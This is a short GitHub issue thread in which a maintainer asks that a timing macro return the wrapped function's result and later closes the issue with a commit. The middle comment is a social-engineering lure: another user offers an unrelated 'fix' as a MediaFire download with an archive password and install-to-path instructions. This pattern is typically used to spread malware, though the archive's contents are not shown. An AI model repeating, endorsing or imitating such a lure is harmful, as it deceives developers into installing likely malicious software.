### ISSUE TITLE
Handle return

### ISSUE THREAD

**Issue by rjzak** [rjzak/code-timing-macros#1]
Ensure the macro'd function returns the result of functions with a return type.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rjzak** [comment]
Completed via b55c06b2e9d928991b41517dc6138d586af665c8
